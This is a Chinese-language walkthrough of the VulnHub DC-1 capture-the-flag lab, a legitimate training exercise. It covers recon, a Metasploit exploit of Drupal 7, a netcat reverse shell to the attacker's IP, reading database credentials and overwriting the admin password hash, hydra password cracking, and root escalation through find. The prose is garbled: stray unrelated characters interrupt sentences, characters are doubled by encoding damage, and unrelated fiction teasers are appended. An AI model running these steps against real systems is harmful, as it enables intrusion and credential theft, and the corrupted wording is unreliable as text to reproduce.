CTF-DC1靶機(jī)攻防

實(shí)驗(yàn)環(huán)境準(zhǔn)備:
kali:172.25.0.69 dc-1: MAC地址:00:0C:29:51:DB:CC
dc-1靶機(jī)下載地址:https://www.vulnhub.com/entry/dc-1,292/

0x01 端口掃描

根據(jù)MAC地址查找靶機(jī)IP地址,得到靶機(jī)IP地址為172.25.0.55
netdiscover -i eth0 -r 172.25.0.0/24 //netdiscover是一個(gè)主動(dòng)/被動(dòng)的 ARP偵查工具,通過(guò)抓取網(wǎng)絡(luò)中的arp廣播包來(lái)確定網(wǎng)絡(luò)中存活的IP
命令詳解 -i 指定網(wǎng)卡 -r 指定掃描的網(wǎng)段

image.png

使用namp工具對(duì)靶機(jī)進(jìn)行端口掃描
nmap -A -p- 172.25.0.55 //全端口掃描
生產(chǎn)環(huán)境基本上用-sS參數(shù)來(lái)進(jìn)行隱蔽掃描
image.png

由端口掃描發(fā)現(xiàn)該主機(jī)dc1-80端口開(kāi)放呼股,由此斷定dc1有基于drupal7CMS對(duì)外發(fā)布的網(wǎng)站業(yè)務(wù)
image.png

另一種查看CMS版本方法:ctrl+u 瀏覽器模式下查看網(wǎng)頁(yè)源碼
image.png

發(fā)現(xiàn)該網(wǎng)站是基于Drupal7版本的cms搭建

0x02 漏洞利用

利用msf進(jìn)行網(wǎng)站滲透
search drupal //查看drupal cms 存在的漏洞

image.png

use 4 //為什么使用這個(gè)exp灾前,具體情況大家具體分析
info 查看當(dāng)前exp可利用的版本味抖,發(fā)現(xiàn)drupal7版本可以進(jìn)行利用


image.png

在msf控制界面運(yùn)行以下命令
set RHOSTS 172.25.0.55
set VHOST 172.25.0.69
exploit
成功拿到該網(wǎng)站服務(wù)器的webshell權(quán)限


image.png

輸入shell命令進(jìn)入shell命令行模式
利用python一句話命令進(jìn)入交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'

image.png

0x03 提權(quán)

發(fā)現(xiàn)dc1存在nc工具且具有-e選項(xiàng)
通過(guò)nc反彈shell到kali
命令如下

nc -lvvp 1234   //kali開(kāi)啟1234端口的監(jiān)聽(tīng)
nc -e /bin/bash 172.25.0.69 1234 //dc1通過(guò)nc連接kali的1234端口

發(fā)現(xiàn)flag1


image.png

根據(jù)flag1提示找到flag2 //可能有人會(huì)問(wèn)為什么配置文件是這個(gè)我又是怎么找到的烤低,百度drupal7配置文件存放路徑
同時(shí)發(fā)現(xiàn)數(shù)據(jù)庫(kù)的用戶名和密碼 'username' => 'dbuser', 'password' => 'R0ck3t',

image.png

由于flag提示我們可以避免使用暴力破解的方法來(lái)破解密碼
我們通過(guò)更新數(shù)據(jù)庫(kù)密碼來(lái)更改后臺(tái)管理員的密碼為admin

php scripts/password-hash.sh admin #生成密碼為 admin的密文
mysql -udbuser -pR0ck3t
use drupaldb;
update users set pass='$S$DhbcpLhyAcXB8jKvGBqS9hbWWSOIACm1nQpvwZt7ZGjK3WFC2stw' where name="admin"

通過(guò)后臺(tái)管理員賬號(hào)登陸網(wǎng)站拿到flag3
用戶名:admin 密碼:admin

image.png

cat /etc/passwd 查看passwd文件發(fā)現(xiàn)存在可登錄shell賬號(hào)flag4
使用hydra進(jìn)行密碼破解 得到flag4用戶密碼為orange


image.png

以flag4身份ssh登陸dc1刑顺,在家目錄下找到flag4


image.png

查看可以以root身份運(yùn)行的命令


image.png

此處我們利用find命令來(lái)進(jìn)行l(wèi)inux提權(quán) //提權(quán)方法有很多種大家可以發(fā)散自己的思維
并且在拿到最后一個(gè)flag 在/root目錄下柔纵,同時(shí)提權(quán)成功拿到該網(wǎng)站服務(wù)器的最高權(quán)限缔杉。


image.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市搁料,隨后出現(xiàn)的幾起案子或详,更是在濱河造成了極大的恐慌,老刑警劉巖郭计,帶你破解...
    沈念sama閱讀 218,204評(píng)論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件霸琴,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡昭伸,警方通過(guò)查閱死者的電腦和手機(jī)梧乘,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,091評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)庐杨,“玉大人选调,你說(shuō)我怎么就攤上這事×榉荩” “怎么了仁堪?”我有些...
    開(kāi)封第一講書(shū)人閱讀 164,548評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)各吨。 經(jīng)常有香客問(wèn)我枝笨,道長(zhǎng)袁铐,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,657評(píng)論 1 293
  • 正文 為了忘掉前任横浑,我火速辦了婚禮剔桨,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘徙融。我一直安慰自己洒缀,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,689評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布欺冀。 她就那樣靜靜地躺著树绩,像睡著了一般。 火紅的嫁衣襯著肌膚如雪隐轩。 梳的紋絲不亂的頭發(fā)上饺饭,一...
    開(kāi)封第一講書(shū)人閱讀 51,554評(píng)論 1 305
  • 那天,我揣著相機(jī)與錄音职车,去河邊找鬼瘫俊。 笑死,一個(gè)胖子當(dāng)著我的面吹牛悴灵,可吹牛的內(nèi)容都是我干的扛芽。 我是一名探鬼主播,決...
    沈念sama閱讀 40,302評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼积瞒,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼川尖!你這毒婦竟也來(lái)了?” 一聲冷哼從身側(cè)響起茫孔,我...
    開(kāi)封第一講書(shū)人閱讀 39,216評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤叮喳,失蹤者是張志新(化名)和其女友劉穎,沒(méi)想到半個(gè)月后银酬,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體嘲更,經(jīng)...
    沈念sama閱讀 45,661評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,851評(píng)論 3 336
  • 正文 我和宋清朗相戀三年揩瞪,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了赋朦。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 39,977評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡李破,死狀恐怖宠哄,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情嗤攻,我是刑警寧澤毛嫉,帶...
    沈念sama閱讀 35,697評(píng)論 5 347
  • 正文 年R本政府宣布,位于F島的核電站妇菱,受9級(jí)特大地震影響承粤,放射性物質(zhì)發(fā)生泄漏暴区。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,306評(píng)論 3 330
  • 文/蒙蒙 一辛臊、第九天 我趴在偏房一處隱蔽的房頂上張望仙粱。 院中可真熱鬧,春花似錦彻舰、人聲如沸伐割。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,898評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)隔心。三九已至,卻和暖如春尚胞,著一層夾襖步出監(jiān)牢的瞬間硬霍,已是汗流浹背。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,019評(píng)論 1 270
  • 我被黑心中介騙來(lái)泰國(guó)打工笼裳, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留须尚,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,138評(píng)論 3 370
  • 正文 我出身青樓侍咱,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親密幔。 傳聞我的和親對(duì)象是個(gè)殘疾皇子楔脯,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,927評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容